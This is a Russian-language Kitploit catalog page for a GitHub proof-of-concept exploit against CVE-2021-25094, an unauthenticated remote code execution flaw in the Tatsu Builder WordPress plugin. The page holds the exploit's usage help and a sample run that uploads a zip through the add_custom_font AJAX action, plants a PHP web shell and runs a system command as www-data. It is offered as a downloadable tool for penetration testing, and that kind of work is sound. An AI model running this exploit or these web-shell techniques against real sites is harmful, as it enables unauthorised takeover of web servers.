Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-25094-tatsu-preauth-rce — Эксплойт proof-of-concept для неаутентифицированного удаленного выполнения кода в плагине Tatsu Builder для WordPress (CVE-2021-25094). Поддерживает несколько техник получения оболочки, прокси и уровни сжатия. | Kitploit
Инструменты/GitHubGitHub/darkpills/cve-2021-25094-tatsu-preauth-rce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubdarkpills/cve-2021-25094-tatsu-preauth-rce

CVE-2021-25094-tatsu-preauth-rce

Эксплойт proof-of-concept для неаутентифицированного удаленного выполнения кода в плагине Tatsu Builder для WordPress (CVE-2021-25094). Поддерживает несколько техник получения оболочки, прокси и уровни сжатия.

Репозиторий
9323 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Preauth RCE в плагине Tatsu builder для WordPress (CVE-2021-25094)

Простой PoC неаутентифицированного RCE в Tatsu Builder <= 3.3.11 в качестве примера.

Полное описание здесь: https://darkpills.com/wordpress-tatsu-builder-preauth-rce-cve-2021-25094/

Использование:

root@kitploit:~
python3 exploit-rce.py [-h] [--technique TECHNIQUE] [--customShell CUSTOMSHELL] [--keep KEEP] [--proxy PROXY] [--compressionLevel COMPRESSIONLEVEL] url cmd

positional arguments:
  url                   Wordpress vulnerable URL (example: https://mywordpress.com/)
  cmd                   OS command to execute

optional arguments:
  -h, --help            show this help message and exit
  --technique TECHNIQUE
                        Shell technique: php | htaccess | custom
  --customShell CUSTOMSHELL
                        Provide a custom PHP shell file that will take a base64 cmd as $_POST['text'] input
  --keep KEEP           Do not auto-destruct the uploaded PHP shell
  --proxy PROXY         Specify and use an HTTP proxy (example: http://localhost:8080)
  --compressionLevel COMPRESSIONLEVEL
                        Compression level of the zip file (0 to 9, default 9)

Пример:

root@kitploit:~
└─$ python3 exploit-rce.py http://wordpress/ id
|=== Tatsudo: pre-auth RCE exploit for Tatsu wordpress plugin <= 3.3.11
|=== CVE-2021-25094 / Vincent MICHEL (@darkpills)

[+] Generating a zip with shell technique 'php'
[+] Uploading zip archive to http://wordpress//wp-admin/admin-ajax.php?action=add_custom_font
[+] Upload OK
[+] Trigger shell at http://wordpress/wp-content/uploads/typehub/custom/hjf/.bfzwt.php
[+] Exploit success!
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Shell file has been auto-deleted but parent directory will remain on the webserver
[+] Job done
Скачать инструмент